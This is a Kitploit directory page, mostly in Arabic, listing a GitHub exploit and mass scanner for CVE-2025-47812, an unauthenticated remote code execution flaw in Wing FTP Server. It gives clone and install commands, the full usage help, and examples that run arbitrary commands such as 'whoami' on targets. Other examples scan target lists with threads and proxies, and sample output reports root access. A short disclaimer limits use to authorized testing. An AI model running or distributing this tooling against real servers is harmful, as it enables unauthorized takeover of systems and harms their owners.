Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-47812 — استغلال وماسح ضوئي لـ CVE-2025-47812 يستهدف تنفيذ الأكواد عن بُعد غير المصادق عليه في خادم Wing FTP، مع دعم الأهداف الفردية، والمسح الشامل، والوكيل، وتنسيقات إخراج متعددة. | Kitploit
أدوات/GitHubGitHub/0xjuarez/cve-2025-47812
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHub0xjuarez/cve-2025-47812

CVE-2025-47812

استغلال وماسح ضوئي لـ CVE-2025-47812 يستهدف تنفيذ الأكواد عن بُعد غير المصادق عليه في خادم Wing FTP، مع دعم الأهداف الفردية، والمسح الشامل، والوكيل، وتنسيقات إخراج متعددة.

عرض المستودع
14منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚀 Wing FTP Exploit - CVE-2025-47812

استغلال محسّن لخادم Wing FTP CVE-2025-47812 - تنفيذ التعليمات البرمجية عن بعد دون مصادقة (RCE)

🔧 التثبيت

قم باستنساخ هذا المستودع وادخل إلى الدليل:

root@kitploit:~
git clone https://github.com/0xjuarez/CVE-2025-47812.git
cd CVE-2025-47812
pip install -r requirements.txt

أو ببساطة قم بتنزيل السكربت CVE-2025-47812.py وقم بتشغيله.

🚀 الاستخدام

root@kitploit:~
usage: CVE-2025-47812.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME] [-P PASSWORD] [--check] [-v] [--proxy PROXY] [--timeout TIMEOUT] [-o OUTPUT] [--output-format {txt,json,csv}] [--threads THREADS] [--no-progress]

Exploit para Wing FTP Server CVE-2025-47812 - versión mejorada

opciones:
  -h, --help            muestra este mensaje
  -u URL, --url URL     URL objetivo (ej. http://192.168.1.100:5466)
  -f FILE, --file FILE  archivo con lista de URLs (una por línea)
  -c COMMAND, --command COMMAND
                        comando a ejecutar (por defecto: echo CVE-2025-47812)
  -U USERNAME, --username USERNAME
                        nombre de usuario (default: anonymous)
  -P PASSWORD, --password PASSWORD
                        contraseña (default: vacía)
  --check               modo verificación: solo comprueba si es vulnerable (usa comando inocuo)
  -v, --verbose         modo verbose (muestra detalles)
  --proxy PROXY         proxy (ej. http://127.0.0.1:8080)
  --timeout TIMEOUT     timeout en segundos (default: 10)
  -o OUTPUT, --output OUTPUT
                        archivo de salida para guardar resultados
  --output-format {txt,json,csv}
                        formato de salida (default: txt)
  --threads THREADS     número de hilos para escanear múltiples objetivos (default: 5)
  --no-progress         ocultar barra de progreso

🎯 أمثلة أساسية

اختبار هدف واحد وتنفيذ أمر:

root@kitploit:~
python CVE-2025-47812.py -u http://192.168.1.100:5466 -c "whoami" -v

وضع التحقق (يكتشف الثغرة فقط):

root@kitploit:~
python CVE-2025-47812.py -u http://192.168.1.100:5466 --check

مسح أهداف متعددة من ملف:

root@kitploit:~
python CVE-2025-47812.py -f targets.txt --threads 10 -o resultados.json --output-format json

استخدام بروكسي ووضع مفصل:

root@kitploit:~
python CVE-2025-47812.py -u http://192.168.1.100:5466 --proxy http://127.0.0.1:8080 -v

📁 بنية ملف الأهداف

يجب أن يحتوي الملف على عنوان URL واحد لكل سطر، على سبيل المثال:

root@kitploit:~
http://192.168.1.10:5466
http://192.168.1.11:5466
https://ftp.miservidor.com:5466

📊 تنسيقات الإخراج

TXT

root@kitploit:~
http://192.168.1.10:5466 - VULNERABLE - usuario: root
http://192.168.1.11:5466 - SEGURO - No vulnerable

JSON

root@kitploit:~
[
  {
    "target": "http://192.168.1.10:5466",
    "vulnerable": true,
    "info": "usuario: root"
  }
]

CSV

root@kitploit:~
Target,Vulnerable,Info
http://192.168.1.10:5466,True,usuario: root

⚠️ تحذير

هذا الاستغلال مصمم للأغراض التعليمية فقط واختبارات الأمن المصرح بها. الاستخدام غير المصرح به لهذه الأداة ضد أنظمة دون موافقة صريحة غير قانوني وقد يؤدي إلى عواقب قانونية خطيرة. لا يتحمل المؤلفون المسؤولية عن أي سوء استخدام قد يحدث.

🤝 الاعتمادات

  • المؤلف الأصلي: Sheikh Mohammad Hasan (4m3rr0r) – الاكتشاف والاستغلال الأساسي.
  • التحسينات وإعادة الهيكلة: 0xJuarez – تمت إضافة وظائف المسح الشامل، الألوان، دعم البروكسيات، تنسيقات إخراج متعددة، وتحسينات في سهولة الاستخدام.

إذا أعجبك هذا العمل، لا تنسى منحه نجمة ⭐ على GitHub!

📄 الترخيص

هذا المشروع مرخص بموجب رخصة MIT – راجع ملف LICENSE لمزيد من التفاصيل.

تنزيل الأداة